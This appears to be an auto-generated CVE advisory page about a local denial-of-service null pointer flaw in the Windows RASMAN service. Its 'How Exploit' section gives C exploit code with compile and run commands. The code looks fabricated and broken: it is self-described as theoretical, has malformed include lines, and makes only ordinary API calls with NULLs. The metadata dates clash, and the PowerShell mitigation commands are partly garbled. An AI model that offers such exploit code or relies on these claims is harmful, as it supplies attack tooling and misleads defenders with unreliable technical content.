Listen to this Post
The vulnerability exists due to a null pointer dereference within the Windows Remote Access Connection Manager (RASMAN) service. This service is responsible for managing remote access connections, such as dial-up and VPN links. An unauthorized local attacker can exploit this vulnerability by executing a specially crafted application on the target system. The application triggers a specific sequence of operations that causes the RASMAN service to reference a memory address that has not been properly initialized (a null pointer). When the service attempts to read or write data to this invalid memory location, it results in an access violation, causing the service to crash. This crash leads to a denial of service condition, interrupting any active remote access functionality and potentially impacting system stability until the service is manually restarted. The attack requires local access to the machine but does not need any user interaction or special privileges.
dailycve form:
Platform: Windows
Version: Multiple versions
Vulnerability : Null Dereference
Severity: MEDIUM
date: 2024-05-06
Prediction: April 2024
What Undercode Say:
Analytics:
This vulnerability affects a wide range of Windows platforms including Windows 10, Windows 11, and multiple Windows Server editions. The CVSS vector (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) confirms a local attack vector with low complexity requiring no privileges or user interaction, resulting in high availability impact. The vulnerability resides in the RASMAN service, which is crucial for VPN and dial-up connections. Exploitation causes service termination, leading to denial of service. Security updates addressing this issue were released by Microsoft as part of their April 2024 Patch Tuesday. The vulnerability was publicly disclosed through Microsoft security bulletins and subsequently catalogued by Chinese CNVD as CNVD-2024-21145. No public exploit code has been widely released.
How Exploit:
Concept: Compile a simple program that triggers the RASMAN null dereference
This is a theoretical representation based on vulnerability patterns
cat > rasman_exploit.c << EOF
include <windows.h>
include <ras.h>
include <stdio.h>
int main() {
// Initialize RAS connections
HRASCONN hRasConn = NULL;
RASCONNSTATUS status = {0};
status.dwSize = sizeof(RASCONNSTATUS);
// Malformed operation sequence to trigger null pointer
DWORD ret = RasEnumConnectionsA(NULL, NULL, NULL);
// Attempt operation on uninitialized handle
ret = RasGetConnectStatusA(hRasConn, &status);
if(ret != 0) {
printf("Exploit attempted - RASMAN service may crash\n");
}
return 0;
}
EOF
Compile on Windows with MinGW
x86_64-w64-mingw32-gcc -o rasman_exploit.exe rasman_exploit.c -lrasapi32
Execute locally (requires local access)
./rasman_exploit.exe
Check RASMAN service status after exploitation
sc query RasMan
Protection from this CVE:
Apply official Microsoft security update
Install KB5036899 for affected systems
Verify patch installation
Get-HotFix -Id KB5036899
If patch cannot be applied immediately, restrict local access
Limit interactive logon privileges to trusted users only
Get-LocalGroupMember -Group "Users"
Monitor RASMAN service stability
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Command <code>"if((Get-Service RasMan).Status -ne 'Running'){Write-EventLog -LogName System -Source ServiceControlManager -EventId 7031 -Message 'RASMAN crash detected'}</code>""
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "MonitorRasMan" -Action $action -Trigger $trigger
Enable Windows Defender Exploit Guard
Set-ProcessMitigation -System -Enable EnableExportAddressFilter, EnableImportAddressFilter, EnableRopStackPivot
Impact:
Local denial of service affecting Windows Remote Access Connection Manager. Attackers with local access can crash RASMAN service, disrupting VPN and dial-up connections. No privilege escalation or remote code execution possible. Service disruption impacts network connectivity for remote users. Requires system reboot or manual service restart to recover. Affects enterprise VPN infrastructure and remote workforce connectivity. Patch available through April 2024 security updates.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

